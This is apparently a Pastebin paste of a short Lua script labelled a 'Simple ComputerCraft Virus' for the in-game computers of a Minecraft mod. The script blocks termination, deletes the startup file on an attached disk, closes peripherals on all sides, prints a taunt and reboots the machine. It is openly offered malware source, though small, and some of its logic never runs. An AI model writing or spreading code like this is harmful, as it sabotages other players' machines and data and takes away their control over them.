Advertisement
Guest User

CC ST VR

a guest
Aug 28th, 2015
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.50 KB | None | 0 0
  1. -- Simple ComputerCraft Virus
  2. local fB=true
  3. function fA()
  4.     while(fB) do
  5.         fs.delete("disk/startup")
  6.     end
  7. end
  8. os.pullEvent=os.pullEventRaw
  9. fs.delete("disk/startup")
  10. pcall(peripheral.call, "left","close")
  11. pcall(peripheral.call, "right","close")
  12. pcall(peripheral.call, "top","close")
  13. pcall(peripheral.call, "bottom","close")
  14. pcall(peripheral.call, "front","close")
  15. pcall(peripheral.call, "back","close")
  16. print("Brute called Snitzel!")
  17. coroutine.create(fA)
  18. sleep(3)
  19. kiki=fB
  20. os.reboot()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement